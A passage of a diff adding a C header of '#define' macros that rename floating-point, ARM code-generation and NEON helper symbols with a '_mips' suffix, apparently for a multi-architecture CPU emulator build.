+#define float32_minnummag float32_minnummag_mips +#define float32_mul float32_mul_mips +#define float32_muladd float32_muladd_mips +#define float32_rem float32_rem_mips +#define float32_round_to_int float32_round_to_int_mips +#define float32_scalbn float32_scalbn_mips +#define float32_set_sign float32_set_sign_mips +#define float32_sqrt float32_sqrt_mips +#define float32_squash_input_denormal float32_squash_input_denormal_mips +#define float32_sub float32_sub_mips +#define float32ToCommonNaN float32ToCommonNaN_mips +#define float32_to_float128 float32_to_float128_mips +#define float32_to_float16 float32_to_float16_mips +#define float32_to_float64 float32_to_float64_mips +#define float32_to_floatx80 float32_to_floatx80_mips +#define float32_to_int16 float32_to_int16_mips +#define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_mips +#define float32_to_int32 float32_to_int32_mips +#define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_mips +#define float32_to_int64 float32_to_int64_mips +#define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_mips +#define float32_to_uint16 float32_to_uint16_mips +#define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_mips +#define float32_to_uint32 float32_to_uint32_mips +#define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_mips +#define float32_to_uint64 float32_to_uint64_mips +#define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_mips +#define float32_unordered float32_unordered_mips +#define float32_unordered_quiet float32_unordered_quiet_mips +#define float64_abs float64_abs_mips +#define float64_add float64_add_mips +#define float64_chs float64_chs_mips +#define float64_compare float64_compare_mips +#define float64_compare_internal float64_compare_internal_mips +#define float64_compare_quiet float64_compare_quiet_mips +#define float64_default_nan float64_default_nan_mips +#define float64_div float64_div_mips +#define float64_eq float64_eq_mips +#define float64_eq_quiet float64_eq_quiet_mips +#define float64_is_any_nan float64_is_any_nan_mips +#define float64_is_infinity float64_is_infinity_mips +#define float64_is_neg float64_is_neg_mips +#define float64_is_quiet_nan float64_is_quiet_nan_mips +#define float64_is_signaling_nan float64_is_signaling_nan_mips +#define float64_is_zero float64_is_zero_mips +#define float64_le float64_le_mips +#define float64_le_quiet float64_le_quiet_mips +#define float64_log2 float64_log2_mips +#define float64_lt float64_lt_mips +#define float64_lt_quiet float64_lt_quiet_mips +#define float64_max float64_max_mips +#define float64_maxnum float64_maxnum_mips +#define float64_maxnummag float64_maxnummag_mips +#define float64_maybe_silence_nan float64_maybe_silence_nan_mips +#define float64_min float64_min_mips +#define float64_minmax float64_minmax_mips +#define float64_minnum float64_minnum_mips +#define float64_minnummag float64_minnummag_mips +#define float64_mul float64_mul_mips +#define float64_muladd float64_muladd_mips +#define float64_rem float64_rem_mips +#define float64_round_to_int float64_round_to_int_mips +#define float64_scalbn float64_scalbn_mips +#define float64_set_sign float64_set_sign_mips +#define float64_sqrt float64_sqrt_mips +#define float64_squash_input_denormal float64_squash_input_denormal_mips +#define float64_sub float64_sub_mips +#define float64ToCommonNaN float64ToCommonNaN_mips +#define float64_to_float128 float64_to_float128_mips +#define float64_to_float16 float64_to_float16_mips +#define float64_to_float32 float64_to_float32_mips +#define float64_to_floatx80 float64_to_floatx80_mips +#define float64_to_int16 float64_to_int16_mips +#define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_mips +#define float64_to_int32 float64_to_int32_mips +#define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_mips +#define float64_to_int64 float64_to_int64_mips +#define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_mips +#define float64_to_uint16 float64_to_uint16_mips +#define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_mips +#define float64_to_uint32 float64_to_uint32_mips +#define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_mips +#define float64_to_uint64 float64_to_uint64_mips +#define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_mips +#define float64_trunc_to_int float64_trunc_to_int_mips +#define float64_unordered float64_unordered_mips +#define float64_unordered_quiet float64_unordered_quiet_mips +#define float_raise float_raise_mips +#define floatx80_add floatx80_add_mips +#define floatx80_compare floatx80_compare_mips +#define floatx80_compare_internal floatx80_compare_internal_mips +#define floatx80_compare_quiet floatx80_compare_quiet_mips +#define floatx80_default_nan floatx80_default_nan_mips +#define floatx80_div floatx80_div_mips +#define floatx80_eq floatx80_eq_mips +#define floatx80_eq_quiet floatx80_eq_quiet_mips +#define floatx80_is_quiet_nan floatx80_is_quiet_nan_mips +#define floatx80_is_signaling_nan floatx80_is_signaling_nan_mips +#define floatx80_le floatx80_le_mips +#define floatx80_le_quiet floatx80_le_quiet_mips +#define floatx80_lt floatx80_lt_mips +#define floatx80_lt_quiet floatx80_lt_quiet_mips +#define floatx80_maybe_silence_nan floatx80_maybe_silence_nan_mips +#define floatx80_mul floatx80_mul_mips +#define floatx80_rem floatx80_rem_mips +#define floatx80_round_to_int floatx80_round_to_int_mips +#define floatx80_scalbn floatx80_scalbn_mips +#define floatx80_sqrt floatx80_sqrt_mips +#define floatx80_sub floatx80_sub_mips +#define floatx80ToCommonNaN floatx80ToCommonNaN_mips +#define floatx80_to_float128 floatx80_to_float128_mips +#define floatx80_to_float32 floatx80_to_float32_mips +#define floatx80_to_float64 floatx80_to_float64_mips +#define floatx80_to_int32 floatx80_to_int32_mips +#define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_mips +#define floatx80_to_int64 floatx80_to_int64_mips +#define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_mips +#define floatx80_unordered floatx80_unordered_mips +#define floatx80_unordered_quiet floatx80_unordered_quiet_mips +#define flush_icache_range flush_icache_range_mips +#define format_string format_string_mips +#define fp_decode_rm fp_decode_rm_mips +#define frame_dummy frame_dummy_mips +#define free_range free_range_mips +#define fstat64 fstat64_mips +#define futex_wait futex_wait_mips +#define futex_wake futex_wake_mips +#define gen_aa32_ld16s gen_aa32_ld16s_mips +#define gen_aa32_ld16u gen_aa32_ld16u_mips +#define gen_aa32_ld32u gen_aa32_ld32u_mips +#define gen_aa32_ld64 gen_aa32_ld64_mips +#define gen_aa32_ld8s gen_aa32_ld8s_mips +#define gen_aa32_ld8u gen_aa32_ld8u_mips +#define gen_aa32_st16 gen_aa32_st16_mips +#define gen_aa32_st32 gen_aa32_st32_mips +#define gen_aa32_st64 gen_aa32_st64_mips +#define gen_aa32_st8 gen_aa32_st8_mips +#define gen_adc gen_adc_mips +#define gen_adc_CC gen_adc_CC_mips +#define gen_add16 gen_add16_mips +#define gen_add_carry gen_add_carry_mips +#define gen_add_CC gen_add_CC_mips +#define gen_add_datah_offset gen_add_datah_offset_mips +#define gen_add_data_offset gen_add_data_offset_mips +#define gen_addq gen_addq_mips +#define gen_addq_lo gen_addq_lo_mips +#define gen_addq_msw gen_addq_msw_mips +#define gen_arm_parallel_addsub gen_arm_parallel_addsub_mips +#define gen_arm_shift_im gen_arm_shift_im_mips +#define gen_arm_shift_reg gen_arm_shift_reg_mips +#define gen_bx gen_bx_mips +#define gen_bx_im gen_bx_im_mips +#define gen_clrex gen_clrex_mips +#define generate_memory_topology generate_memory_topology_mips +#define generic_timer_cp_reginfo generic_timer_cp_reginfo_mips +#define gen_exception gen_exception_mips +#define gen_exception_insn gen_exception_insn_mips +#define gen_exception_internal gen_exception_internal_mips +#define gen_exception_internal_insn gen_exception_internal_insn_mips +#define gen_exception_return gen_exception_return_mips +#define gen_goto_tb gen_goto_tb_mips +#define gen_helper_access_check_cp_reg gen_helper_access_check_cp_reg_mips +#define gen_helper_add_saturate gen_helper_add_saturate_mips +#define gen_helper_add_setq gen_helper_add_setq_mips +#define gen_helper_clear_pstate_ss gen_helper_clear_pstate_ss_mips +#define gen_helper_clz32 gen_helper_clz32_mips +#define gen_helper_clz64 gen_helper_clz64_mips +#define gen_helper_clz_arm gen_helper_clz_arm_mips +#define gen_helper_cpsr_read gen_helper_cpsr_read_mips +#define gen_helper_cpsr_write gen_helper_cpsr_write_mips +#define gen_helper_crc32_arm gen_helper_crc32_arm_mips +#define gen_helper_crc32c gen_helper_crc32c_mips +#define gen_helper_crypto_aese gen_helper_crypto_aese_mips +#define gen_helper_crypto_aesmc gen_helper_crypto_aesmc_mips +#define gen_helper_crypto_sha1_3reg gen_helper_crypto_sha1_3reg_mips +#define gen_helper_crypto_sha1h gen_helper_crypto_sha1h_mips +#define gen_helper_crypto_sha1su1 gen_helper_crypto_sha1su1_mips +#define gen_helper_crypto_sha256h gen_helper_crypto_sha256h_mips +#define gen_helper_crypto_sha256h2 gen_helper_crypto_sha256h2_mips +#define gen_helper_crypto_sha256su0 gen_helper_crypto_sha256su0_mips +#define gen_helper_crypto_sha256su1 gen_helper_crypto_sha256su1_mips +#define gen_helper_double_saturate gen_helper_double_saturate_mips +#define gen_helper_exception_internal gen_helper_exception_internal_mips +#define gen_helper_exception_with_syndrome gen_helper_exception_with_syndrome_mips +#define gen_helper_get_cp_reg gen_helper_get_cp_reg_mips +#define gen_helper_get_cp_reg64 gen_helper_get_cp_reg64_mips +#define gen_helper_get_r13_banked gen_helper_get_r13_banked_mips +#define gen_helper_get_user_reg gen_helper_get_user_reg_mips +#define gen_helper_iwmmxt_addcb gen_helper_iwmmxt_addcb_mips +#define gen_helper_iwmmxt_addcl gen_helper_iwmmxt_addcl_mips +#define gen_helper_iwmmxt_addcw gen_helper_iwmmxt_addcw_mips +#define gen_helper_iwmmxt_addnb gen_helper_iwmmxt_addnb_mips +#define gen_helper_iwmmxt_addnl gen_helper_iwmmxt_addnl_mips +#define gen_helper_iwmmxt_addnw gen_helper_iwmmxt_addnw_mips +#define gen_helper_iwmmxt_addsb gen_helper_iwmmxt_addsb_mips +#define gen_helper_iwmmxt_addsl gen_helper_iwmmxt_addsl_mips +#define gen_helper_iwmmxt_addsw gen_helper_iwmmxt_addsw_mips +#define gen_helper_iwmmxt_addub gen_helper_iwmmxt_addub_mips +#define gen_helper_iwmmxt_addul gen_helper_iwmmxt_addul_mips +#define gen_helper_iwmmxt_adduw gen_helper_iwmmxt_adduw_mips +#define gen_helper_iwmmxt_align gen_helper_iwmmxt_align_mips +#define gen_helper_iwmmxt_avgb0 gen_helper_iwmmxt_avgb0_mips +#define gen_helper_iwmmxt_avgb1 gen_helper_iwmmxt_avgb1_mips +#define gen_helper_iwmmxt_avgw0 gen_helper_iwmmxt_avgw0_mips +#define gen_helper_iwmmxt_avgw1 gen_helper_iwmmxt_avgw1_mips +#define gen_helper_iwmmxt_bcstb gen_helper_iwmmxt_bcstb_mips +#define gen_helper_iwmmxt_bcstl gen_helper_iwmmxt_bcstl_mips +#define gen_helper_iwmmxt_bcstw gen_helper_iwmmxt_bcstw_mips +#define gen_helper_iwmmxt_cmpeqb gen_helper_iwmmxt_cmpeqb_mips +#define gen_helper_iwmmxt_cmpeql gen_helper_iwmmxt_cmpeql_mips +#define gen_helper_iwmmxt_cmpeqw gen_helper_iwmmxt_cmpeqw_mips +#define gen_helper_iwmmxt_cmpgtsb gen_helper_iwmmxt_cmpgtsb_mips +#define gen_helper_iwmmxt_cmpgtsl gen_helper_iwmmxt_cmpgtsl_mips +#define gen_helper_iwmmxt_cmpgtsw gen_helper_iwmmxt_cmpgtsw_mips +#define gen_helper_iwmmxt_cmpgtub gen_helper_iwmmxt_cmpgtub_mips +#define gen_helper_iwmmxt_cmpgtul gen_helper_iwmmxt_cmpgtul_mips +#define gen_helper_iwmmxt_cmpgtuw gen_helper_iwmmxt_cmpgtuw_mips +#define gen_helper_iwmmxt_insr gen_helper_iwmmxt_insr_mips +#define gen_helper_iwmmxt_macsw gen_helper_iwmmxt_macsw_mips +#define gen_helper_iwmmxt_macuw gen_helper_iwmmxt_macuw_mips +#define gen_helper_iwmmxt_maddsq gen_helper_iwmmxt_maddsq_mips +#define gen_helper_iwmmxt_madduq gen_helper_iwmmxt_madduq_mips +#define gen_helper_iwmmxt_maxsb gen_helper_iwmmxt_maxsb_mips +#define gen_helper_iwmmxt_maxsl gen_helper_iwmmxt_maxsl_mips +#define gen_helper_iwmmxt_maxsw gen_helper_iwmmxt_maxsw_mips +#define gen_helper_iwmmxt_maxub gen_helper_iwmmxt_maxub_mips +#define gen_helper_iwmmxt_maxul gen_helper_iwmmxt_maxul_mips +#define gen_helper_iwmmxt_maxuw gen_helper_iwmmxt_maxuw_mips +#define gen_helper_iwmmxt_minsb gen_helper_iwmmxt_minsb_mips +#define gen_helper_iwmmxt_minsl gen_helper_iwmmxt_minsl_mips +#define gen_helper_iwmmxt_minsw gen_helper_iwmmxt_minsw_mips +#define gen_helper_iwmmxt_minub gen_helper_iwmmxt_minub_mips +#define gen_helper_iwmmxt_minul gen_helper_iwmmxt_minul_mips +#define gen_helper_iwmmxt_minuw gen_helper_iwmmxt_minuw_mips +#define gen_helper_iwmmxt_msbb gen_helper_iwmmxt_msbb_mips +#define gen_helper_iwmmxt_msbl gen_helper_iwmmxt_msbl_mips +#define gen_helper_iwmmxt_msbw gen_helper_iwmmxt_msbw_mips +#define gen_helper_iwmmxt_muladdsl gen_helper_iwmmxt_muladdsl_mips +#define gen_helper_iwmmxt_muladdsw gen_helper_iwmmxt_muladdsw_mips +#define gen_helper_iwmmxt_muladdswl gen_helper_iwmmxt_muladdswl_mips +#define gen_helper_iwmmxt_mulshw gen_helper_iwmmxt_mulshw_mips +#define gen_helper_iwmmxt_mulslw gen_helper_iwmmxt_mulslw_mips +#define gen_helper_iwmmxt_muluhw gen_helper_iwmmxt_muluhw_mips +#define gen_helper_iwmmxt_mululw gen_helper_iwmmxt_mululw_mips +#define gen_helper_iwmmxt_packsl gen_helper_iwmmxt_packsl_mips +#define gen_helper_iwmmxt_packsq gen_helper_iwmmxt_packsq_mips +#define gen_helper_iwmmxt_packsw gen_helper_iwmmxt_packsw_mips +#define gen_helper_iwmmxt_packul gen_helper_iwmmxt_packul_mips +#define gen_helper_iwmmxt_packuq gen_helper_iwmmxt_packuq_mips +#define gen_helper_iwmmxt_packuw gen_helper_iwmmxt_packuw_mips +#define gen_helper_iwmmxt_rorl gen_helper_iwmmxt_rorl_mips +#define gen_helper_iwmmxt_rorq gen_helper_iwmmxt_rorq_mips +#define gen_helper_iwmmxt_rorw gen_helper_iwmmxt_rorw_mips +#define gen_helper_iwmmxt_sadb gen_helper_iwmmxt_sadb_mips +#define gen_helper_iwmmxt_sadw gen_helper_iwmmxt_sadw_mips +#define gen_helper_iwmmxt_setpsr_nz gen_helper_iwmmxt_setpsr_nz_mips +#define gen_helper_iwmmxt_shufh gen_helper_iwmmxt_shufh_mips +#define gen_helper_iwmmxt_slll gen_helper_iwmmxt_slll_mips +#define gen_helper_iwmmxt_sllq gen_helper_iwmmxt_sllq_mips +#define gen_helper_iwmmxt_sllw gen_helper_iwmmxt_sllw_mips +#define gen_helper_iwmmxt_sral gen_helper_iwmmxt_sral_mips +#define gen_helper_iwmmxt_sraq gen_helper_iwmmxt_sraq_mips +#define gen_helper_iwmmxt_sraw gen_helper_iwmmxt_sraw_mips +#define gen_helper_iwmmxt_srll gen_helper_iwmmxt_srll_mips +#define gen_helper_iwmmxt_srlq gen_helper_iwmmxt_srlq_mips +#define gen_helper_iwmmxt_srlw gen_helper_iwmmxt_srlw_mips +#define gen_helper_iwmmxt_subnb gen_helper_iwmmxt_subnb_mips +#define gen_helper_iwmmxt_subnl gen_helper_iwmmxt_subnl_mips +#define gen_helper_iwmmxt_subnw gen_helper_iwmmxt_subnw_mips +#define gen_helper_iwmmxt_subsb gen_helper_iwmmxt_subsb_mips +#define gen_helper_iwmmxt_subsl gen_helper_iwmmxt_subsl_mips +#define gen_helper_iwmmxt_subsw gen_helper_iwmmxt_subsw_mips +#define gen_helper_iwmmxt_subub gen_helper_iwmmxt_subub_mips +#define gen_helper_iwmmxt_subul gen_helper_iwmmxt_subul_mips +#define gen_helper_iwmmxt_subuw gen_helper_iwmmxt_subuw_mips +#define gen_helper_iwmmxt_unpackhb gen_helper_iwmmxt_unpackhb_mips +#define gen_helper_iwmmxt_unpackhl gen_helper_iwmmxt_unpackhl_mips +#define gen_helper_iwmmxt_unpackhsb gen_helper_iwmmxt_unpackhsb_mips +#define gen_helper_iwmmxt_unpackhsl gen_helper_iwmmxt_unpackhsl_mips +#define gen_helper_iwmmxt_unpackhsw gen_helper_iwmmxt_unpackhsw_mips +#define gen_helper_iwmmxt_unpackhub gen_helper_iwmmxt_unpackhub_mips +#define gen_helper_iwmmxt_unpackhul gen_helper_iwmmxt_unpackhul_mips +#define gen_helper_iwmmxt_unpackhuw gen_helper_iwmmxt_unpackhuw_mips +#define gen_helper_iwmmxt_unpackhw gen_helper_iwmmxt_unpackhw_mips +#define gen_helper_iwmmxt_unpacklb gen_helper_iwmmxt_unpacklb_mips +#define gen_helper_iwmmxt_unpackll gen_helper_iwmmxt_unpackll_mips +#define gen_helper_iwmmxt_unpacklsb gen_helper_iwmmxt_unpacklsb_mips +#define gen_helper_iwmmxt_unpacklsl gen_helper_iwmmxt_unpacklsl_mips +#define gen_helper_iwmmxt_unpacklsw gen_helper_iwmmxt_unpacklsw_mips +#define gen_helper_iwmmxt_unpacklub gen_helper_iwmmxt_unpacklub_mips +#define gen_helper_iwmmxt_unpacklul gen_helper_iwmmxt_unpacklul_mips +#define gen_helper_iwmmxt_unpackluw gen_helper_iwmmxt_unpackluw_mips +#define gen_helper_iwmmxt_unpacklw gen_helper_iwmmxt_unpacklw_mips +#define gen_helper_neon_abd_f32 gen_helper_neon_abd_f32_mips +#define gen_helper_neon_abdl_s16 gen_helper_neon_abdl_s16_mips +#define gen_helper_neon_abdl_s32 gen_helper_neon_abdl_s32_mips +#define gen_helper_neon_abdl_s64 gen_helper_neon_abdl_s64_mips +#define gen_helper_neon_abdl_u16 gen_helper_neon_abdl_u16_mips +#define gen_helper_neon_abdl_u32 gen_helper_neon_abdl_u32_mips +#define gen_helper_neon_abdl_u64 gen_helper_neon_abdl_u64_mips +#define gen_helper_neon_abd_s16 gen_helper_neon_abd_s16_mips +#define gen_helper_neon_abd_s32 gen_helper_neon_abd_s32_mips +#define gen_helper_neon_abd_s8 gen_helper_neon_abd_s8_mips +#define gen_helper_neon_abd_u16 gen_helper_neon_abd_u16_mips +#define gen_helper_neon_abd_u32 gen_helper_neon_abd_u32_mips +#define gen_helper_neon_abd_u8 gen_helper_neon_abd_u8_mips +#define gen_helper_neon_abs_s16 gen_helper_neon_abs_s16_mips +#define gen_helper_neon_abs_s8 gen_helper_neon_abs_s8_mips +#define gen_helper_neon_acge_f32 gen_helper_neon_acge_f32_mips +#define gen_helper_neon_acgt_f32 gen_helper_neon_acgt_f32_mips +#define gen_helper_neon_addl_saturate_s32 gen_helper_neon_addl_saturate_s32_mips +#define gen_helper_neon_addl_saturate_s64 gen_helper_neon_addl_saturate_s64_mips +#define gen_helper_neon_addl_u16 gen_helper_neon_addl_u16_mips +#define gen_helper_neon_addl_u32 gen_helper_neon_addl_u32_mips +#define gen_helper_neon_add_u16 gen_helper_neon_add_u16_mips +#define gen_helper_neon_add_u8 gen_helper_neon_add_u8_mips +#define gen_helper_neon_ceq_f32 gen_helper_neon_ceq_f32_mips +#define gen_helper_neon_ceq_u16 gen_helper_neon_ceq_u16_mips +#define gen_helper_neon_ceq_u32 gen_helper_neon_ceq_u32_mips +#define gen_helper_neon_ceq_u8 gen_helper_neon_ceq_u8_mips +#define gen_helper_neon_cge_f32 gen_helper_neon_cge_f32_mips +#define gen_helper_neon_cge_s16 gen_helper_neon_cge_s16_mips +#define gen_helper_neon_cge_s32 gen_helper_neon_cge_s32_mips +#define gen_helper_neon_cge_s8 gen_helper_neon_cge_s8_mips +#define gen_helper_neon_cge_u16 gen_helper_neon_cge_u16_mips +#define gen_helper_neon_cge_u32 gen_helper_neon_cge_u32_mips +#define gen_helper_neon_cge_u8 gen_helper_neon_cge_u8_mips +#define gen_helper_neon_cgt_f32 gen_helper_neon_cgt_f32_mips +#define gen_helper_neon_cgt_s16 gen_helper_neon_cgt_s16_mips +#define gen_helper_neon_cgt_s32 gen_helper_neon_cgt_s32_mips +#define gen_helper_neon_cgt_s8 gen_helper_neon_cgt_s8_mips +#define gen_helper_neon_cgt_u16 gen_helper_neon_cgt_u16_mips +#define gen_helper_neon_cgt_u32 gen_helper_neon_cgt_u32_mips +#define gen_helper_neon_cgt_u8 gen_helper_neon_cgt_u8_mips +#define gen_helper_neon_cls_s16 gen_helper_neon_cls_s16_mips +#define gen_helper_neon_cls_s32 gen_helper_neon_cls_s32_mips +#define gen_helper_neon_cls_s8 gen_helper_neon_cls_s8_mips +#define gen_helper_neon_clz_u16 gen_helper_neon_clz_u16_mips +#define gen_helper_neon_clz_u8 gen_helper_neon_clz_u8_mips +#define gen_helper_neon_cnt_u8 gen_helper_neon_cnt_u8_mips +#define gen_helper_neon_fcvt_f16_to_f32 gen_helper_neon_fcvt_f16_to_f32_mips +#define gen_helper_neon_fcvt_f32_to_f16 gen_helper_neon_fcvt_f32_to_f16_mips +#define gen_helper_neon_hadd_s16 gen_helper_neon_hadd_s16_mips +#define gen_helper_neon_hadd_s32 gen_helper_neon_hadd_s32_mips +#define gen_helper_neon_hadd_s8 gen_helper_neon_hadd_s8_mips +#define gen_helper_neon_hadd_u16 gen_helper_neon_hadd_u16_mips +#define gen_helper_neon_hadd_u32 gen_helper_neon_hadd_u32_mips +#define gen_helper_neon_hadd_u8 gen_helper_neon_hadd_u8_mips +#define gen_helper_neon_hsub_s16 gen_helper_neon_hsub_s16_mips +#define gen_helper_neon_hsub_s32 gen_helper_neon_hsub_s32_mips +#define gen_helper_neon_hsub_s8 gen_helper_neon_hsub_s8_mips +#define gen_helper_neon_hsub_u16 gen_helper_neon_hsub_u16_mips +#define gen_helper_neon_hsub_u32 gen_helper_neon_hsub_u32_mips +#define gen_helper_neon_hsub_u8 gen_helper_neon_hsub_u8_mips +#define gen_helper_neon_max_s16 gen_helper_neon_max_s16_mips +#define gen_helper_neon_max_s32 gen_helper_neon_max_s32_mips +#define gen_helper_neon_max_s8 gen_helper_neon_max_s8_mips +#define gen_helper_neon_max_u16 gen_helper_neon_max_u16_mips +#define gen_helper_neon_max_u32 gen_helper_neon_max_u32_mips +#define gen_helper_neon_max_u8 gen_helper_neon_max_u8_mips +#define gen_helper_neon_min_s16 gen_helper_neon_min_s16_mips +#define gen_helper_neon_min_s32 gen_helper_neon_min_s32_mips +#define gen_helper_neon_min_s8 gen_helper_neon_min_s8_mips +#define gen_helper_neon_min_u16 gen_helper_neon_min_u16_mips +#define gen_helper_neon_min_u32 gen_helper_neon_min_u32_mips +#define gen_helper_neon_min_u8 gen_helper_neon_min_u8_mips +#define gen_helper_neon_mull_p8 gen_helper_neon_mull_p8_mips +#define gen_helper_neon_mull_s16 gen_helper_neon_mull_s16_mips +#define gen_helper_neon_mull_s8 gen_helper_neon_mull_s8_mips +#define gen_helper_neon_mull_u16 gen_helper_neon_mull_u16_mips +#define gen_helper_neon_mull_u8 gen_helper_neon_mull_u8_mips +#define gen_helper_neon_mul_p8 gen_helper_neon_mul_p8_mips +#define gen_helper_neon_mul_u16 gen_helper_neon_mul_u16_mips +#define gen_helper_neon_mul_u8 gen_helper_neon_mul_u8_mips +#define gen_helper_neon_narrow_high_u16 gen_helper_neon_narrow_high_u16_mips +#define gen_helper_neon_narrow_high_u8 gen_helper_neon_narrow_high_u8_mips +#define gen_helper_neon_narrow_round_high_u16 gen_helper_neon_narrow_round_high_u16_mips +#define gen_helper_neon_narrow_round_high_u8 gen_helper_neon_narrow_round_high_u8_mips +#define gen_helper_neon_narrow_sat_s16 gen_helper_neon_narrow_sat_s16_mips +#define gen_helper_neon_narrow_sat_s32 gen_helper_neon_narrow_sat_s32_mips +#define gen_helper_neon_narrow_sat_s8 gen_helper_neon_narrow_sat_s8_mips +#define gen_helper_neon_narrow_sat_u16 gen_helper_neon_narrow_sat_u16_mips +#define gen_helper_neon_narrow_sat_u32 gen_helper_neon_narrow_sat_u32_mips +#define gen_helper_neon_narrow_sat_u8 gen_helper_neon_narrow_sat_u8_mips +#define gen_helper_neon_narrow_u16 gen_helper_neon_narrow_u16_mips +#define gen_helper_neon_narrow_u8 gen_helper_neon_narrow_u8_mips +#define gen_helper_neon_negl_u16 gen_helper_neon_negl_u16_mips +#define gen_helper_neon_negl_u32 gen_helper_neon_negl_u32_mips +#define gen_helper_neon_paddl_u16 gen_helper_neon_paddl_u16_mips +#define gen_helper_neon_paddl_u32 gen_helper_neon_paddl_u32_mips +#define gen_helper_neon_padd_u16 gen_helper_neon_padd_u16_mips +#define gen_helper_neon_padd_u8 gen_helper_neon_padd_u8_mips +#define gen_helper_neon_pmax_s16 gen_helper_neon_pmax_s16_mips +#define gen_helper_neon_pmax_s8 gen_helper_neon_pmax_s8_mips +#define gen_helper_neon_pmax_u16 gen_helper_neon_pmax_u16_mips +#define gen_helper_neon_pmax_u8 gen_helper_neon_pmax_u8_mips +#define gen_helper_neon_pmin_s16 gen_helper_neon_pmin_s16_mips +#define gen_helper_neon_pmin_s8 gen_helper_neon_pmin_s8_mips +#define gen_helper_neon_pmin_u16 gen_helper_neon_pmin_u16_mips +#define gen_helper_neon_pmin_u8 gen_helper_neon_pmin_u8_mips +#define gen_helper_neon_pmull_64_hi gen_helper_neon_pmull_64_hi_mips +#define gen_helper_neon_pmull_64_lo gen_helper_neon_pmull_64_lo_mips +#define gen_helper_neon_qabs_s16 gen_helper_neon_qabs_s16_mips +#define gen_helper_neon_qabs_s32 gen_helper_neon_qabs_s32_mips +#define gen_helper_neon_qabs_s8 gen_helper_neon_qabs_s8_mips +#define gen_helper_neon_qadd_s16 gen_helper_neon_qadd_s16_mips +#define gen_helper_neon_qadd_s32 gen_helper_neon_qadd_s32_mips +#define gen_helper_neon_qadd_s64 gen_helper_neon_qadd_s64_mips +#define gen_helper_neon_qadd_s8 gen_helper_neon_qadd_s8_mips +#define gen_helper_neon_qadd_u16 gen_helper_neon_qadd_u16_mips +#define gen_helper_neon_qadd_u32 gen_helper_neon_qadd_u32_mips +#define gen_helper_neon_qadd_u64 gen_helper_neon_qadd_u64_mips +#define gen_helper_neon_qadd_u8 gen_helper_neon_qadd_u8_mips +#define gen_helper_neon_qdmulh_s16 gen_helper_neon_qdmulh_s16_mips +#define gen_helper_neon_qdmulh_s32 gen_helper_neon_qdmulh_s32_mips +#define gen_helper_neon_qneg_s16 gen_helper_neon_qneg_s16_mips +#define gen_helper_neon_qneg_s32 gen_helper_neon_qneg_s32_mips +#define gen_helper_neon_qneg_s8 gen_helper_neon_qneg_s8_mips +#define gen_helper_neon_qrdmulh_s16 gen_helper_neon_qrdmulh_s16_mips +#define gen_helper_neon_qrdmulh_s32 gen_helper_neon_qrdmulh_s32_mips +#define gen_helper_neon_qrshl_s16 gen_helper_neon_qrshl_s16_mips +#define gen_helper_neon_qrshl_s32 gen_helper_neon_qrshl_s32_mips +#define gen_helper_neon_qrshl_s64 gen_helper_neon_qrshl_s64_mips +#define gen_helper_neon_qrshl_s8 gen_helper_neon_qrshl_s8_mips +#define gen_helper_neon_qrshl_u16 gen_helper_neon_qrshl_u16_mips +#define gen_helper_neon_qrshl_u32 gen_helper_neon_qrshl_u32_mips +#define gen_helper_neon_qrshl_u64 gen_helper_neon_qrshl_u64_mips +#define gen_helper_neon_qrshl_u8 gen_helper_neon_qrshl_u8_mips +#define gen_helper_neon_qshl_s16 gen_helper_neon_qshl_s16_mips +#define gen_helper_neon_qshl_s32 gen_helper_neon_qshl_s32_mips +#define gen_helper_neon_qshl_s64 gen_helper_neon_qshl_s64_mips +#define gen_helper_neon_qshl_s8 gen_helper_neon_qshl_s8_mips +#define gen_helper_neon_qshl_u16 gen_helper_neon_qshl_u16_mips +#define gen_helper_neon_qshl_u32 gen_helper_neon_qshl_u32_mips +#define gen_helper_neon_qshl_u64 gen_helper_neon_qshl_u64_mips +#define gen_helper_neon_qshl_u8 gen_helper_neon_qshl_u8_mips +#define gen_helper_neon_qshlu_s16 gen_helper_neon_qshlu_s16_mips +#define gen_helper_neon_qshlu_s32 gen_helper_neon_qshlu_s32_mips +#define gen_helper_neon_qshlu_s64 gen_helper_neon_qshlu_s64_mips +#define gen_helper_neon_qshlu_s8 gen_helper_neon_qshlu_s8_mips +#define gen_helper_neon_qsub_s16 gen_helper_neon_qsub_s16_mips +#define gen_helper_neon_qsub_s32 gen_helper_neon_qsub_s32_mips +#define gen_helper_neon_qsub_s64 gen_helper_neon_qsub_s64_mips +#define gen_helper_neon_qsub_s8 gen_helper_neon_qsub_s8_mips +#define gen_helper_neon_qsub_u16 gen_helper_neon_qsub_u16_mips +#define gen_helper_neon_qsub_u32 gen_helper_neon_qsub_u32_mips +#define gen_helper_neon_qsub_u64 gen_helper_neon_qsub_u64_mips +#define gen_helper_neon_qsub_u8 gen_helper_neon_qsub_u8_mips +#define gen_helper_neon_qunzip16 gen_helper_neon_qunzip16_mips +#define gen_helper_neon_qunzip32 gen_helper_neon_qunzip32_mips +#define gen_helper_neon_qunzip8 gen_helper_neon_qunzip8_mips +#define gen_helper_neon_qzip16 gen_helper_neon_qzip16_mips +#define gen_helper_neon_qzip32 gen_helper_neon_qzip32_mips +#define gen_helper_neon_qzip8 gen_helper_neon_qzip8_mips +#define gen_helper_neon_rhadd_s16 gen_helper_neon_rhadd_s16_mips +#define gen_helper_neon_rhadd_s32 gen_helper_neon_rhadd_s32_mips +#define gen_helper_neon_rhadd_s8 gen_helper_neon_rhadd_s8_mips +#define gen_helper_neon_rhadd_u16 gen_helper_neon_rhadd_u16_mips +#define gen_helper_neon_rhadd_u32 gen_helper_neon_rhadd_u32_mips +#define gen_helper_neon_rhadd_u8 gen_helper_neon_rhadd_u8_mips +#define gen_helper_neon_rshl_s16 gen_helper_neon_rshl_s16_mips +#define gen_helper_neon_rshl_s32 gen_helper_neon_rshl_s32_mips +#define 